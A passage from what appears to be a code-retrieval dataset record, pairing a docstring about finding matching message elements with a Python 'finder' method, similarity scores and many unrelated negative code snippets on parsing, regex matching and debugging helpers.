cache\r\n if not exists(CASHE + movie_name + '\\\\'):\r\n makedirs(CASHE + movie_name + '\\\\')\r\n\r\n self.receive = Receiver(port, self.partnum, CASHE + movie_name + '\\\\')\r\n self.receive.start()\r\n\r\n #upload stream approved\r\n elif data[:16] == 'upload_approved:':\r\n port = int(data[16:])\r\n self.uploader = Uploader(port, upload_path)\r\n self.uploader.start()\r\n self.upload_num = 1\r\n\r\n elif data[:6] == 'parts:':\r\n if data[6:].isdigit():\r\n self.partnum = int(data[6:])\r\n\r\n elif data[:8] == 'invalid:':\r\n self.uploader = None\r\n if data[8:] == 'hash':\r\n self.upload_num = 2\r\n else:\r\n self.upload_num = 3\r\n\r\n print 'invalid upload'\r\n\r\n elif data == 'vid_not_found':\r\n self.partnum = -1\r\n print 'could not watch vid'\r\n\r\n elif data[:8] == 'results:':\r\n results = data[8:].split(':<!>:')\r\n self.res_list = [['Movie Name', 'views', 'grade']]\r\n for i in results:\r\n datas = i.split(':!:')\r\n self.res_list.append(datas)\r\n self.print_results = True\r\n '''if results == ['']:\r\n self.print_results = False\r\n else:\r\n self.print_results = True'''", "def Parse(cls, event):\n raw_data_type = event.get(u'data_type')\n data_type = None\n\n if isinstance(raw_data_type, basestring):\n data_type = raw_data_type\n elif isinstance(raw_data_type, dict):\n data_type = raw_data_type.get(u'stream')\n\n if data_type in cls._parser_clases:\n parsed_data = cls._parser_clases[data_type].Parse(event)\n\n if not parsed_data or parsed_data.IsEmpty():\n return event_data.EventData()\n\n parsed_data.event_data_type = data_type\n target_datum_candidates = [\n parsed_data.Get(event_data.MachineName(target=True)),\n parsed_data.Get(event_data.Ip(target=True)),\n parsed_data.Get(event_data.StorageFileName(target=True))]\n target_id = utils.FirstValidDatum(\n target_datum_candidates, default=u'UNKNOWN')\n\n for inf in [event_data.UserName(target=True),\n event_data.UserId(target=True)]:\n inf = parsed_data.Get(inf)\n if inf:\n inf.value += u'@' + target_id\n\n source_datum_candidates = [\n parsed_data.Get(event_data.MachineName(source=True)),\n parsed_data.Get(event_data.Ip(source=True)),\n parsed_data.Get(event_data.StorageFileName(source=True))]\n source_id = utils.FirstValidDatum(\n source_datum_candidates, default=u'UNKNOWN')\n\n for inf in [event_data.UserName(source=True),\n event_data.UserId(source=True)]:\n inf = parsed_data.Get(inf)\n if inf:\n inf.value += u'@' + source_id\n\n\n parsed_data.timestamp = event.get(u'timestamp')\n uuid = event.get(u'uuid', cls.GetNextEventId())\n parsed_data.event_id = event.get(u'timesketch_id', uuid)\n return parsed_data\n else:\n return event_data.EventData()" ]
[ "0.7193137", "0.6979878", "0.6934807", "0.6921208", "0.670192", "0.66826284", "0.66826284", "0.66826284", "0.66826284", "0.66752", "0.66359085", "0.6599634", "0.6561199", "0.6499567", "0.6447754", "0.6330373", "0.6247721", "0.62246966", "0.61490583", "0.61253613", "0.61129683", "0.6079707", "0.6076046", "0.6066148", "0.6052577", "0.6040321", "0.5992207", "0.5990528", "0.5982665", "0.59667355", "0.5965855", "0.5952658", "0.59513175", "0.59503895", "0.5949345", "0.594932", "0.594576", "0.5944557", "0.5944402", "0.5936024", "0.5912703", "0.590844", "0.5898976", "0.58953035", "0.58902305", "0.5866859", "0.58655846", "0.58594906", "0.58487195", "0.5807204", "0.5797157", "0.5795831", "0.5793954", "0.5792674", "0.57860035", "0.5782702", "0.57752526", "0.5760482", "0.5753625", "0.57049", "0.56982136", "0.56894255", "0.5679022", "0.567186", "0.566648", "0.56612235", "0.5659188", "0.56565106", "0.5653891", "0.56538504", "0.5639366", "0.56348044", "0.56304383", "0.5630299", "0.56197083", "0.5608648", "0.5606191", "0.5605622", "0.5597577", "0.55821145", "0.55707926", "0.5565751", "0.55606985", "0.55573624", "0.5553231", "0.55483717", "0.554103", "0.5540279", "0.5533201", "0.55310977", "0.5529249", "0.55289376", "0.5527955", "0.5526273", "0.55236197", "0.5521488", "0.55108994", "0.5500505", "0.5490922", "0.54888815" ]
0.58469677
49
Return the elements in the message that match the given parameters. match is the type of elements you want to get (check the parse_type variable to see the possibilities); using ! at the start of match will reverse the value of positive. occurences will select which nth matching elements to capture. None will find everything.
def finder(self, match="w", occurences=None, start=None, stop=None, trigger=True, positive=True, reverse=False, keep_prefix=False):
    res = []
    length = len(self.parse_type)
    if occurences != None:
        occurences = str(occurences)
    index_array = self.indexes(occurences, 1)
    is_capturing = (start == None)
    target = 0
    if match == None:
        match = "xwoifmrcs"
    if len(match) > 0 and match[0] == "!":
        positive = (positive == False)
    for idx in range(length*reverse-reverse, length*(-reverse+1)-reverse, (-reverse)*2+1): #xd lol
        if is_capturing == False:
            if type(start) == type(0):
                is_capturing = (idx == start)
            else:
                is_capturing = (self.parse_type[idx] in start)
        if stop != None:
            if trigger == True or is_capturing == True:
                if type(stop) == type(0) and (idx == stop):
                    break
                if type(stop) == " " and (self.parse_type[idx] in stop):
                    break
        if is_capturing == True:
            if (self.parse_type[idx] in match) == positive:
                if target in index_array:
                    res.append(self.parse_msg[idx][(keep_prefix == False and self.parse_type[idx] in "ox"):])
                target += 1
    if len(res) == 0:
        return None
    return res
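The finder code above is hard to exercise on its own because it expects to live on a parser object exposing parse_type, parse_msg and an indexes() helper, none of which appear in this snippet. Below is a minimal, hypothetical harness for trying it out: the SimpleNamespace stand-in, the example message, the type-code string "owwxw" and the behaviour of the _indexes stand-in are assumptions made for illustration only, not part of the original class.

from types import SimpleNamespace

def _indexes(occurences, _arg):
    # Stand-in for the real self.indexes() helper, which is not shown here.
    # Assumed behaviour: None means "every occurrence", otherwise a
    # comma-separated list of occurrence numbers such as "0,2".
    # The second argument's meaning is unknown, so it is ignored.
    if occurences is None:
        return range(999)  # large enough to cover every occurrence in this toy example
    return [int(i) for i in str(occurences).split(",")]

# Fake parser instance: only the three attributes finder() actually touches.
p = SimpleNamespace(
    parse_type="owwxw",                                    # one assumed type code per element
    parse_msg=["@alice", "hello", "big", "!42", "world"],  # the elements at the same indexes
    indexes=_indexes,
)

print(finder(p, match="w"))                     # word-typed elements only
print(finder(p, match="!w"))                    # "!" inverts positive: everything except "w"
print(finder(p, match=None, occurences="0,2"))  # any type, but only the 1st and 3rd matches

With keep_prefix left at False, the leading character of "o"- and "x"-typed elements (here "@" and "!") is stripped from the captured values.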
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _any_depth_parse(match):\n markers = [match.p1, match.p2, match.p3, match.p4, match.p5, match.p6]\n for idx in (4, 5):\n if markers[idx]:\n markers[idx] = mtypes.emphasize(markers[idx])\n return [m for m in markers if m]", "def onNameType(self, match):\n\t\treturn [self.process(match[0]), self.process(match[1])]", "def getMatch(data):\n if len(data) > 15:\n return 'date: {0} {1}, match => {2}, {3}, {4}| 1x2 => {5}, {6}, {7}| handicap => {8}, {9}, {10}, {11}| OU => {12}, {13}, {14}, {15}'.format(data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9], data[10], data[11], data[12], data[13], data[14], data[15], data[16])\n return 'date: {0} {1}, match => {2}, {3}, {4}| handicap => {5}, {6}, {7}, {8}| OU => {9}, {10}, {11}, {12}'.format(data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9], data[10], data[11], data[12], data[13])", "def split_match(self, match):\n\n match, line, col, error, warning, message, near = super().split_match(match)\n\n if line is not None and line == -1 and message:\n line = 0\n\n return match, line, col, error, warning, message, near", "def tok_match_record(matchlist, remainder_str, xtoken, matched_substr):\n\tpstr_infostr = matched_substr\n\txtok_infostr = re.sub(r'<([^<>\"]{1,3})\\w*(?: \\w+=\"([^<>\"]{1,3})\\w*\")?>',\n\t r'\\1',\n\t xtoken.tagout)\n\t# print(\"SAVE p-substr:'%s' =~ m/%s/ix\" % (pstr_infostr,xtok_infostr),file=sys.stderr)\n\t\n\t# -a- préparation du substitut balisé en xml\n\t# £ pseudo_out == 'rendu'\n\t# debg\n\tpseudo_out = xtoken.tagout+str_escape(matched_substr)+xtoken.endout\n\t\n\t# -b- enregistrement\n\tmatchlist.append(pseudo_out)\n\ti = len(matchlist)\n\t\n\t# -c- effacement dans le remainder\n\t# (substitution par un renvoi à la \\4 ex: #(#4#)#)\n\t# £todo!!! 
: interdire matches dans les renvois précédents (exemple n° volume == n° de renvoi) !\n\tremainder_str = re.sub(xtoken.re, \"#(#%i-%s#)#\" % (i, xtok_infostr), remainder_str)\n\t\n\treturn(matchlist, remainder_str)", "def logs(self, **kwargs):\n matches = []\n for record in self.buffer:\n found_match = True\n for (key, value) in kwargs.items():\n if key == 'msg':\n # Regexp match\n if not re.search(value, str(record.get(key))):\n found_match = False\n break\n elif key == 'args':\n for (exp, act) in zip(value, record.get(key)):\n if not re.search(str(exp), str(act)):\n found_match = False\n break\n elif not value == record.get(key):\n found_match = False\n break\n if found_match:\n matches.append(record)\n return matches", "def onExpressionList(self, match):\n\t\thead=self.process(match[0])\n\t\ttail=self.process(match[1])\n\t\tres=[head]\n\t\tfor _ in tail:\n\t\t\tres.append(_[1])\n\t\treturn res", "def processMatch(match, justLabel=False):\n response = []\n staticAttrs = [ 'gameId' , 'gameDuration' ]\n if not 'participants' in match or len(match['participants']) < 1:\n raise Exception('[-] wrong match!')\n if justLabel:\n response += staticAttrs\n firstPart = match['participants'][0]\n response += extractAttrs(firstPart, justLabel)\n return response\n for participant in match['participants']:\n partAttrs = []\n # firstly adding the static attributes\n for staticKey in staticAttrs:\n partAttrs += [match[staticKey]]\n # then the others\n partAttrs += extractAttrs(participant)\n response.append(partAttrs)\n return response", "def split_match(self, match):\n\n match, line, col, error, warning, message, near = super().split_match(match)\n\n if match:\n message = '[xvlog] ' + message\n\n return match, line, col, error, warning, message, near", "def extractTagsAndParams(self, elements, text, matches):\n stripped = u''\n \n taglist = u'|'.join(elements)\n if taglist not in _startRegexHash:\n _startRegexHash[taglist] = re.compile(ur\"<(\" + taglist + ur\")(\\s+[^>]*?|\\s*?)(/?>)|<(!--)\", re.UNICODE | re.IGNORECASE)\n start = _startRegexHash[taglist]\n \n while text != u'':\n p = start.split(text, 1)\n stripped += p[0]\n if len(p) == 1:\n break\n elif p[4]:\n # comment\n element = p[4]\n attributes = u''\n close = u''\n else:\n element = p[1]\n attributes = p[2]\n close = p[3]\n inside = p[5]\n \n global _extractTagsAndParams_n\n marker = self.uniq_prefix + u'-' + element + u'-' + (u\"%08X\" % _extractTagsAndParams_n) + u'-QINU'\n _extractTagsAndParams_n += 1\n stripped += marker\n \n if close == u'/>':\n # empty element tag, <tag />\n content = ''\n text = inside\n tail = ''\n else:\n if element == u'!--':\n end = _endCommentPat\n else:\n if element not in _endRegexHash:\n _endRegexHash[element] = re.compile(ur'(</' + element + ur'\\s*>)', re.UNICODE | re.IGNORECASE)\n end = _endRegexHash[element]\n q = end.split(inside, 1)\n content = q[0]\n if len(q) < 3:\n # no end tag\n tail = ''\n text = ''\n else:\n tail = q[1]\n text = q[2]\n \n matches[marker] = (\n element,\n content,\n self.decodeTagAttributes(attributes),\n u\"<\" + element + attributes + close + content + tail\n )\n return stripped", "def split_match(self, match):\n match, line, col, error, warning, message, near = super().split_match(match)\n if match:\n message = '[vcom] ' + message\n return match, line, col, error, warning, message, near", "def _matchPart(self, part):\r\n return [{**{key.name:p[key.name] for key in self.groups},\r\n **({#Call recursively on nested subpattern\r\n self.name:self.nestedPattern._matchPart(\r\n #and 
match\r\n p[0])}\r\n #only if subpattern exists\r\n if self.nestedPattern is not None else {})}\r\n for p in re.finditer(self.regex, part)\r\n #discard any record in ignored\r\n if not any([p[key.name] in self.ignored[key]\r\n for key in self.ignored])]", "def parse_last_exception(message):\n for pattern, response in patterns:\n items_found = re.findall(pattern, repr(message))\n if items_found:\n #print(\"FOUND\", items_found)\n print_exception_message(response, items_found[0])\n break\n else:\n unrecognised_exception(message)", "def logs(self, **kwargs):\n matches = []\n for record in self.buffer:\n found_match = True\n for (key, value) in kwargs.items():\n if key == 'msg':\n # Regexp match\n if not re.search(value, str(record.get(key))):\n found_match = False\n break\n elif not value == record.get(key):\n found_match = False\n break\n if found_match:\n matches.append(record)\n return matches", "def _parse_msg(msg):\n split_args_regex = \"(.*?)\\:(.*)\"\n args_split_regex = \"\\,\"\n match = re.match(split_args_regex, msg)\n if match is not None:\n message = match.group(1)\n arg_str = match.group(2)\n arg_iter = re.finditer(args_split_regex, args)\n args = []\n for arg in arg_iter:\n args.append(arg) \n return None", "def message_matches(cls, msg, regex):\n m = regex.match(msg.text)\n if m:\n return m.groups()\n return None", "def getContentList(self, content, index=-1):\n try:\n if index == -1: # this is a return for a single instance site\n repattern = re.compile(self.RegEx, re.IGNORECASE)\n foundlist = re.findall(repattern, content)\n return foundlist\n else: # this is the return for a multisite\n repattern = re.compile(self.RegEx[index], re.IGNORECASE)\n foundlist = re.findall(repattern, content)\n return foundlist\n except:\n self.postErrorMessage(self.ErrorMessage + \" \" + self.FullURL)\n return None", "def split_match(self, match):\n match, line, col, error, warning, message, near = super().split_match(match)\n\n no_doc_index = message.find(\"has no :Doc\")\n if no_doc_index > 0:\n error = False\n warning = \"Warning\"\n near = message[:no_doc_index].strip()\n elif message.startswith(\"@HV\"):\n near = \"@HV\"\n\n if error:\n error = \" \"\n elif warning:\n warning = \" \"\n else:\n error = \" \"\n\n if (match is None) or match.group('filename').startswith('atcc-'):\n return match, line, col, error, warning, message, near\n\n temp_name = match.group('filename')\n if ((self.LastIncludeMatch is not None) and\n (self.LastIncludeMatch[0:2] == (self.filename, temp_name))):\n region = self.LastIncludeMatch[2]\n else:\n region = self.view.find(r\"\\s*File\\s+\" + temp_name, 0)\n self.LastIncludeMatch = (self.filename, temp_name, region)\n\n if region is not None:\n line = self.view.rowcol(region.begin())[0] + 1\n near = temp_name\n return match, line, col, error, warning, message, near\n else:\n return match, None, None, None, None, None, None", "def parse(cls, buf: memoryview, params: Params) \\\n -> tuple[AnyParseable, memoryview]:\n for data_type in params.expected:\n try:\n return data_type.parse(buf, params)\n except NotParseable:\n pass\n raise UnexpectedType(buf)", "def parseResult(self):\n\n # parse all WHYPO tags\n result = []\n for msg in [m for m in self.msg if \"WHYPO\" in m]:\n\n list = self.pattern.findall(msg)\n for prop in list:\n if \"WORD\" in prop:\n value = prop.split('\"')[1]\n result.append(value)\n return result", "def match(self):\n\n # We initate this variable which gonna contain the returned data\n result = []\n\n # We compile the regex string\n to_match = 
comp(self.regex)\n\n # In case we have to use the implementation of ${BASH_REMATCH} we use\n # re.findall otherwise, we use re.search\n if self.rematch: # pylint: disable=no-member\n pre_result = to_match.findall(self.data)\n else:\n pre_result = to_match.search(self.data)\n\n if self.return_data and pre_result is not None: # pylint: disable=no-member\n if self.rematch: # pylint: disable=no-member\n for data in pre_result:\n if isinstance(data, tuple):\n result.extend(list(data))\n else:\n result.append(data)\n\n if self.group != 0: # pylint: disable=no-member\n return result[self.group] # pylint: disable=no-member\n else:\n result = pre_result.group(\n self.group # pylint: disable=no-member\n ).strip()\n\n return result\n elif (\n not self.return_data # pylint: disable=no-member\n and pre_result is not None\n ):\n return True\n return False", "def test_searchOrMessageSet(self):\n return self._messageSetSearchTest('OR 2:* 2:*', [2, 3, 4, 5])", "def filter_args_num(self, matches: str, args: int) -> List[str]:\n filtered: List[str] = []\n if args == 1:\n for i, match in enumerate(matches):\n if match.endswith(\"/arg\"):\n filtered.append(matches[i][:-4])\n else:\n for i, match in enumerate(matches):\n if match.endswith(\"/arg[%d]\" % args):\n # Make sure we don't cause an IndexError (end of list)\n # Check to make sure arg + 1 doesn't exist\n if (i == (len(matches) - 1) or\n not matches[i + 1].endswith(\"/arg[%d]\" %\n (args + 1))):\n filtered.append(matches[i][:-len(\"/arg[%d]\" % args)])\n\n return filtered", "def test_multi_no_match_return_expr(self):\n eq_(None,line_matches_greps(self.line,[\"foo\",\"idontmatch\"]))", "def test_searchAndMessageSet(self):\n return self._messageSetSearchTest('2:* 3', [3])", "def missed_matches(self, match_type) -> list:\n missed = []\n for result in self.get_results(match_type, TestSearchResult.Source.LEGACY.value):\n if result['pairedIndex'] == -1:\n missed.append(result)\n return missed", "def findall_simple(pattern, string):\n return [x[0] if isinstance(x, tuple) else x for x in re.findall(pattern=pattern, string=string)]", "def process_match(text, pos):\n m, _ = parse_ent('<' + text + '>', pos - len(text))\n return len(text) - len(m) + 2", "def test_multi_match_return_expr(self):\n eq_(None,line_no_matches_ngreps(self.line,[\"foo\",\"bar\"]))", "def handleMatch(self, m):\r\n pass", "def findAllMatches(re_string, text, handler, start=0):\n regex = re.compile(re_string, re.MULTILINE | re.DOTALL | re.IGNORECASE)\n match = regex.search(text, start)\n results = []\n \n startpoint = -1\n endpoint = -1\n \n if match:\n startpoint = match.start()\n \n while match:\n start = match.end()\n results.append(handler(match))\n endpoint = match.end()\n match = regex.search(text, start)\n \n returntext = text\n if startpoint != -1 and endpoint != -1:\n returntext = text.replace(text[startpoint:endpoint], \"\")\n\n return results, returntext", "def _parse_preprocess(match):\n match_transformed = []\n substructs = {} #{Count: substruct}\n def preprocess_func(leaf):\n \"\"\" evaluates all Count instances so that they refer to fixed group \"\"\"\n if isinstance(leaf, Repeated):\n new_leaf = leaf.count.value # evaluates and stores value directly\n # CAUTION: +1 as we now start counting at 0, but regex start counting at 1 for groups\n match_transformed.append(match.ends(new_leaf + 1))\n # recursive call\n leaf.structure.map(preprocess_func)\n # from here on everything is executed depth first (by recursion)\n substructs[new_leaf] = leaf.structure\n\n # elif isinstance(leaf, 
Count):\n else: #there should be no other case\n new_leaf = leaf.value # evaluates and stores value directly\n # CAUTION: +1 as we now start counting at 0, but regex start counting at 1 for groups\n match_transformed.append((match.ends(new_leaf + 1), match.captures(new_leaf + 1)))\n\n return new_leaf # new_leaf is int\n\n return match_transformed, substructs, preprocess_func", "def parse_message(message):\n request_iter = request_regex.finditer(message.body())\n requests = []\n for build_request in request_iter:\n requests.append(determine_request(build_request))\n if requests:\n results = serverset.build_request(requests)\n message.reply(build_reply(results))", "def _match(self) -> None:\n self.matched = [i for i in self.data if self.match(i)]\n self.unmatched = [i for i in self.data if not self.match(i)]", "def MatchAll():\n return {\"match_all\": {}}", "def msg_ele(msg):\n for word in msg:\n if '=' in word:\n return\n yield word", "def Parse(self):\n for element in self.elements:\n if isinstance(element, Placeholder):\n self._MatchTextPlaceholder(element)\n else:\n self._MatchNode(element)", "def look(self):\n\t\tself.send(\"look\")\n\t\tmsg = self.recv()\n\n\t\tmsg_tokens = []\n\t\ttiles = []\n\n\t\tfor i in range(msg.size()):\n\t\t\tmsg_tokens.append(msg.get(i))\n\t\tfor tok in msg_tokens:\n\t\t\ttiles.append(tok.split(\"|\"))\n\n\t\treturn tiles", "def onExpressionBlock(self, match):\n\t\tlines=self.process(match[1])\n\t\tres=[]\n\t\tfor _ in lines:\n\t\t\tres = (res + _[2])\n\t\treturn res", "def parse_rrs(payload, offset, quantity):\n rrs = []\n for i in range(quantity):\n subtype = get_record_type(payload, offset)\n # print \"subtype \" + subtype\n rr, length = subtype.fromData(payload, offset)\n rrs.append(rr)\n offset += length\n \n return rrs, offset", "def test_searchMessageSetWithList(self):\n # 6 is bigger than the biggest message sequence number, but that's\n # okay, because N:* includes the biggest message sequence number even\n # if N is bigger than that (read the rfc nub).\n return self._messageSetSearchTest('(6:*)', [5])", "def process_matches(matches: List[EndpointMatch]) -> List[Result] :\n out=[]\n #sort data\n sort_f = lambda match: match.endpoint_1.name\n sorted_matches = sorted(matches, key = sort_f)\n #group by endpoint 1\n for key, group in itertools.groupby(sorted_matches, key = sort_f ):\n #sort by score\n endpoint_matches = sorted(list(group), key = lambda match: match.score,reverse=True)\n #best match\n best_match = endpoint_matches[0]\n #others\n other_matches = \";\".join([f\"{a.endpoint_2.name}|{a.score:.3g}\" for a in endpoint_matches[1:] ])\n\n out.append(Result(\n best_match.endpoint_1.name,\n best_match.endpoint_2.name,\n best_match.score,\n \";\".join(best_match.endpoint_1.matches),\n \";\".join(best_match.endpoint_2.matches),\n best_match.endpoint_1.regex,\n best_match.endpoint_2.regex,\n other_matches\n ))\n return out", "def parseMsg(self):\n # These 4 elements are always present\n # \"ToUserName\"\n # \"FromUserName\"\n # \"CreateTime\"\n # \"MsgType\"\n\n # Following elements depends on MsgType\n # \"MsgId\"\n # \"Content\"\n # \"MediaId\"\n # \"PicUrl\"\n # \"Format\"\n # \"ThumbMediaId\"\n # \"Location_X\"\n # \"Location_Y\"\n # \"Scale\"\n # \"Label\"\n # \"Title\"\n # \"Description\"\n # \"Url\"\n # \"Event\"\n # \"EventKey\"\n # \"Ticket\"\n # \"Latitude\"\n # \"Longitude\"\n # \"Precision\"\n # \"Recognition\"\n\n def getField(req, key):\n if req.find(key) != None:\n return req.find(key).text\n\n\n msg = {}\n req = 
et.fromstring(self.request.body.decode(\"utf-8\"))\n\n # These 4 elements are always present\n msg[\"ToUserName\"] = getField(req, \"ToUserName\")\n msg[\"FromUserName\"] = getField(req, \"FromUserName\")\n msg[\"CreateTime\"] = getField(req, \"CreateTime\")\n msg[\"MsgType\"] = getField(req, \"MsgType\")\n\n # Following elements depends on MsgType\n msg[\"MsgId\"] = getField(req, \"MsgId\")\n msg[\"Content\"] = getField(req, \"Content\")\n msg[\"MediaId\"] = getField(req, \"MediaId\")\n msg[\"PicUrl\"] = getField(req, \"PicUrl\")\n msg[\"Format\"] = getField(req, \"Format\")\n msg[\"ThumbMediaId\"] = getField(req, \"ThumbMediaId\")\n msg[\"Location_X\"] = getField(req, \"Location_X\")\n msg[\"Location_Y\"] = getField(req, \"Location_Y\")\n msg[\"Scale\"] = getField(req, \"Scale\")\n msg[\"Label\"] = getField(req, \"Label\")\n msg[\"Title\"] = getField(req, \"Title\")\n msg[\"Description\"] = getField(req, \"Description\")\n msg[\"Url\"] = getField(req, \"Url\")\n msg[\"Event\"] = getField(req, \"Event\")\n msg[\"EventKey\"] = getField(req, \"EventKey\")\n msg[\"Ticket\"] = getField(req, \"Ticket\")\n msg[\"Latitude\"] = getField(req, \"Latitude\")\n msg[\"Longitude\"] = getField(req, \"Longitude\")\n msg[\"Precision\"] = getField(req, \"Precision\")\n msg[\"Recognition\"] = getField(req, \"Recognition\")\n return msg", "def process_match(\n self,\n entry, \n test_index, \n test, \n defaults\n ):\n format_string = ''\n if \"test_exception\" in entry and \\\n entry[\"test_exception\"] is not None:\n out_string = entry[\"test_exception\"]\n else:\n if \"format\" in test:\n format_string = test[\"format\"]\n elif \"format\" in defaults:\n format_string = defaults[\"format\"]\n else:\n return \n out_string = Output.populate_format(entry, format_string)\n self.results.append(out_string)", "def test_searchNotMessageSet(self):\n return self._messageSetSearchTest('NOT 2:*', [1])", "def split_fix_msgs( longstring ) :\n return tuple( filter(lambda x: x, re.split('(8=FIX\\\\.[45]\\\\.[0-9]\\x01.*?\\x0110=[0-9]{3}\\x01)', longstring)) )", "def find_matches_to_message(\n self, message: str\n ) -> Tuple[Optional[str], Optional[Module]]:\n processed_message = message.lower()\n for _, module in self.modules.get_modules():\n if not module.is_loaded:\n continue\n for func_name, reg_list in module.module_settings.templates.items():\n for reg in reg_list:\n find_match = re.findall(reg, processed_message)\n if find_match:\n return (func_name, module)\n\n return (None, None)", "def parse_list_payload(payload):\n # the payload begins with a constant header\n if payload[0] != 'cbu':\n raise ValueError('Invalid list payload header: {}'.format(payload[0]))\n\n # the first submessage is always present, so let's treat it light a header\n first_submsg = payload[1][0][0]\n if len(first_submsg) == 5:\n (unknown_int, unknown_none, unknown_str, unknown_none_or_list,\n timestamp) = first_submsg\n unknown_list = None\n elif len(first_submsg) == 6:\n (unknown_int, unknown_none, unknown_str, unknown_none_or_list,\n timestamp, unknown_list) = first_submsg\n else:\n raise ValueError('Cannot parse first submessage: {}'\n .format(first_submsg))\n\n # The type of a submessage is determined by its position in the array\n submsgs = payload[1][0][1:]\n for submsg_type, submsg in enumerate(submsgs):\n if submsg is None:\n pass\n elif submsg_type == 1:\n # parse chat message\n conversation_id = submsg[0][0][0]\n sender_ids = submsg[0][1]\n timestamp = submsg[0][2]\n content = submsg[0][6]\n type_ = content[2][0][0][0]\n if type_ == 0: 
# text\n type_, text, formatting = content[2][0][0]\n links = None\n elif type_ == 2: # link\n type_, text, formatting, links = content[2][0][0]\n else:\n raise ValueError('Unknown message type {} for message: {}'\n .format(type_, submsg))\n yield {\n 'conversation_id': conversation_id,\n 'timestamp': timestamp,\n 'sender_ids': tuple(sender_ids),\n 'text': text,\n }\n\n elif submsg_type == 2:\n # TODO: parse unknown\n # conversation_id, sender_ids, timestamp, 1, 20\n pass\n elif submsg_type == 3:\n # TODO: parse unknown\n # conversation_id, sender_ids, timestand, 1 or 2\n pass\n elif submsg_type == 6:\n # TODO: parse unknown\n # sender_ids, conversation_id, timestamp\n pass\n elif submsg_type == 11:\n # TODO: parse conversation update\n pass\n elif submsg_type == 12:\n # TODO: parse unknown\n pass\n else:\n raise ValueError('Unknown submessage type {} for submessage {}'\n .format(submsg_type, submsg))", "def match1(text, *patterns):\n\n if len(patterns) == 1:\n pattern = patterns[0]\n match = re.search(pattern, text)\n if match:\n return match.group(1)\n else:\n return None\n else:\n ret = []\n for pattern in patterns:\n match = re.search(pattern, text)\n if match:\n ret.append(match.group(1))\n return ret", "def match1(text, *patterns):\n\n if len(patterns) == 1:\n pattern = patterns[0]\n match = re.search(pattern, text)\n if match:\n return match.group(1)\n else:\n return None\n else:\n ret = []\n for pattern in patterns:\n match = re.search(pattern, text)\n if match:\n ret.append(match.group(1))\n return ret", "def split_match(self, match):\n\n error = super().split_match(match)\n error['near'] = self.search_token(error['message'])\n\n return error", "async def parse_regex(opsdroid, skills, message):\n matched_skills = []\n for skill in skills:\n for matcher in skill.matchers:\n if \"regex\" in matcher:\n opts = matcher[\"regex\"]\n matched_regex = await match_regex(message.text, opts)\n if matched_regex:\n message.regex = matched_regex\n for regroup, value in matched_regex.groupdict().items():\n message.update_entity(regroup, value, None)\n matched_skills.append(\n {\n \"score\": await calculate_score(\n opts[\"expression\"], opts[\"score_factor\"]\n ),\n \"skill\": skill,\n \"config\": skill.config,\n \"message\": message,\n }\n )\n return matched_skills", "def first_match(s,patterns):\n\n for p in patterns:\n m=p.match(s)\n if m:\n return p,m\n return None,None", "def SearchRe(context, pattern, arg=None):\n if not arg:\n arg = context.node\n arg = Conversions.StringValue(arg)\n matches = re.findall(pattern, arg)\n proc = context.processor\n matches_nodeset = []\n for groups in matches:\n proc.pushResult()\n proc.writers[-1].startElement('Match', EMPTY_NAMESPACE)\n if type(groups) != type(()):\n groups = (groups,)\n for group in groups:\n proc.writers[-1].startElement('Group', EMPTY_NAMESPACE)\n proc.writers[-1].text(group)\n proc.writers[-1].endElement('Group')\n proc.writers[-1].endElement('Match')\n frag = proc.popResult()\n context.rtfs.append(frag)\n matches_nodeset.append(frag.childNodes[0])\n return matches_nodeset", "def parse(self, buf: memoryview, params: Params) \\\n -> tuple[ParseableTypeT_co, memoryview]:\n ...", "def test_searchMessageSetWithStar(self):\n return self._messageSetSearchTest('2:*', [2, 3, 4, 5])", "def parse_messages(buffer):\n messages = []\n message, expected = parse_message(buffer)\n\n while message:\n messages.append(message)\n message, expected = parse_message(buffer)\n\n return messages, expected", "def rpc_match():", "def parse_many2(self,\n 
inuse=None,\n tcache=None,\n fast=None,\n allow_invalid=False,\n separate_addresses_non_verbose=True,\n header_once=None,\n count_handle=None,\n count_printed=None,\n ):\n addresses = []\n if not self.args.addresses:\n print(\"WARNING: No address supplied?\")\n self.parser.print_help()\n return []\n else:\n addresses = self.dbg.parse_address(self.args.addresses)\n if len(addresses) == 0:\n pu.print_error(\"WARNING: No valid address supplied\")\n self.parser.print_help()\n return []\n\n if self.args.hexdump_unit not in h.hexdump_units:\n pu.print_error(\"Wrong hexdump unit specified\")\n self.parser.print_help()\n return []\n hexdump_unit = self.args.hexdump_unit\n count = self.args.count\n search_depth = self.args.search_depth\n skip_header = self.args.skip_header\n print_offset = self.args.print_offset\n metadata = self.args.metadata\n verbose = self.args.verbose\n no_newline = self.args.no_newline\n debug = self.args.debug\n hexdump = self.args.hexdump\n maxbytes = self.args.maxbytes\n commands = self.args.commands\n address_offset = self.args.address_offset\n\n if self.args.search_type not in ptchunk.search_types:\n pu.print_error(f\"Wrong search type specified {self.args.search_type}\")\n self.parser.print_help()\n return []\n if self.args.search_type != \"string\" and not self.args.search_value.startswith(\"0x\"):\n pu.print_error(\"Wrong search value for specified type\")\n self.parser.print_help()\n return []\n search_value = self.args.search_value\n search_type = self.args.search_type\n match_only = self.args.match_only\n\n highlight_only = self.args.highlight_only\n highlight_addresses = []\n if self.args.highlight_addresses:\n list_highlight_addresses = [e.strip() for e in self.args.highlight_addresses.split(\",\")]\n highlight_addresses = self.dbg.parse_address(list_highlight_addresses)\n if len(highlight_addresses) == 0:\n pu.print_error(\"WARNING: No valid address to highlight supplied\")\n self.parser.print_help()\n return []\n highlight_metadata = []\n if self.args.highlight_metadata:\n highlight_metadata = [e.strip() for e in self.args.highlight_metadata.split(\",\")]\n\n # some commands inheriting ptchunk arguments don't support highlighting types\n try:\n highlight_types = self.args.highlight_types\n except AttributeError:\n highlight_types = None\n if highlight_types:\n highlight_types = [e.strip() for e in highlight_types.split(\",\")]\n for e in highlight_types:\n if e not in [\"M\", \"F\", \"f\", \"t\"]:\n pu.print_error(\"WARNING: Invalid type to highlight supplied\")\n self.parser.print_help()\n return []\n else:\n highlight_types = []\n\n\n all_chunks = []\n chunks = None\n for address in addresses:\n if chunks is not None and len(chunks) > 0 and \\\n (separate_addresses_non_verbose or verbose > 0):\n print(\"-\" * 60)\n\n if count_printed == None:\n count_linear = count\n elif count == None:\n count_linear = count_printed\n else:\n count_linear = min(count_printed, count)\n chunks = ptchunk.parse_many(\n address, self.ptm, self.dbg, count_linear, count_handle, 